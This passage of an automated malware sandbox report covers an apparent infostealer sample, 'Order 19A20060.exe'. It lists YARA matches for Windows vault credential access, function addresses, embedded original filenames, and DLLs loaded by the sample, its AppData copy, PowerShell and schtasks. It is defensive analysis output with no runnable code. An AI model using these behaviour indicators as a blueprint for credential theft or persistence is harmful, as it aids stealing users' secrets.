                        Source: 0.2.Order 19A20060.exe.4513b20.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 8.2.Order 19A20060.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.Order 19A20060.exe.4513b20.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.Order 19A20060.exe.44d8f00.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: initial sampleStatic PE information: Filename: Order 19A20060.exe
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_0300DCB40_2_0300DCB4
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_057274100_2_05727410
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_057200400_2_05720040
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_0572001F0_2_0572001F
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A300400_2_07A30040
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A3EFF00_2_07A3EFF0
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A30B000_2_07A30B00
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A30AF10_2_07A30AF1
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A300370_2_07A30037
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A845700_2_07A84570
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A883880_2_07A88388
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A835E80_2_07A835E8
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A835D70_2_07A835D7
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A8A5000_2_07A8A500
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A845630_2_07A84563
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A8B4800_2_07A8B480
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A800370_2_07A80037
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A8B0480_2_07A8B048
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A800400_2_07A80040
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A8CF800_2_07A8CF80
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A8CF900_2_07A8CF90
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A8BCF00_2_07A8BCF0
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_07A8B8B80_2_07A8B8B8
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 0_2_0AC021B00_2_0AC021B0
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 8_2_013DE6278_2_013DE627
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 8_2_013DDB978_2_013DDB97
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 8_2_013D4A988_2_013D4A98
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 8_2_013D3E808_2_013D3E80
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 8_2_013D41C88_2_013D41C8
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 8_2_013DA9608_2_013DA960
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 8_2_06A455A08_2_06A455A0
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 8_2_06A47D908_2_06A47D90
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 8_2_06A465E88_2_06A465E8
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 8_2_06A4B2388_2_06A4B238
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 8_2_06A430588_2_06A43058
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 8_2_06A476988_2_06A47698
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 8_2_06A45CDF8_2_06A45CDF
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 8_2_06A4E3A88_2_06A4E3A8
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 8_2_06A423408_2_06A42340
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 8_2_06A400078_2_06A40007
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 8_2_06A400408_2_06A40040
                        Source: C:\Users\user\Desktop\Order 19A20060.exeCode function: 8_2_06A4056F8_2_06A4056F
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_024BDCB49_2_024BDCB4
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_056800409_2_05680040
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_056875A89_2_056875A8
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_0568EFF09_2_0568EFF0
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_056800069_2_05680006
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_05680B009_2_05680B00
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_05680AF19_2_05680AF1
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_056D45709_2_056D4570
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_056D83989_2_056D8398
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_056D45629_2_056D4562
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_056D35E89_2_056D35E8
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_056D35D79_2_056D35D7
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_056DB4709_2_056DB470
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_056DB4809_2_056DB480
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_056DB0489_2_056DB048
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_056D00409_2_056D0040
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_056DB0299_2_056DB029
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_056D00079_2_056D0007
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_056D83889_2_056D8388
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_056DBCF09_2_056DBCF0
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_056DCF809_2_056DCF80
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_056DCF909_2_056DCF90
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_056DB8B89_2_056DB8B8
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 9_2_0A1212A89_2_0A1212A8
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 15_2_0294E62715_2_0294E627
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 15_2_02944A9815_2_02944A98
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 15_2_0294AA1B15_2_0294AA1B
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 15_2_02943E8015_2_02943E80
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 15_2_029441C815_2_029441C8
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 15_2_066755A015_2_066755A0
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 15_2_06677D9015_2_06677D90
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 15_2_0667B23815_2_0667B238
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 15_2_0667305815_2_06673058
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 15_2_0667769815_2_06677698
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 15_2_06675CDF15_2_06675CDF
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 15_2_0667234015_2_06672340
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 15_2_0667E3A815_2_0667E3A8
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 15_2_0667004015_2_06670040
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeCode function: 15_2_0667000615_2_06670006
                        Source: Order 19A20060.exeStatic PE information: invalid certificate
                        Source: Order 19A20060.exe, 00000000.00000002.1679354233.0000000004443000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename1aa5ed53-faea-433c-bf5f-9e47e14be233.exe4 vs Order 19A20060.exe
                        Source: Order 19A20060.exe, 00000000.00000002.1679354233.0000000004443000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Order 19A20060.exe
                        Source: Order 19A20060.exe, 00000000.00000002.1676980877.000000000113E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Order 19A20060.exe
                        Source: Order 19A20060.exe, 00000000.00000002.1683229864.0000000007F80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Order 19A20060.exe
                        Source: Order 19A20060.exe, 00000000.00000002.1678263931.000000000320C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename1aa5ed53-faea-433c-bf5f-9e47e14be233.exe4 vs Order 19A20060.exe
                        Source: Order 19A20060.exe, 00000008.00000002.4094648140.0000000000F39000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Order 19A20060.exe
                        Source: Order 19A20060.exeBinary or memory string: OriginalFilenameTBIu.exe< vs Order 19A20060.exe
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeSection loaded: sspicli.dllJump to behavior
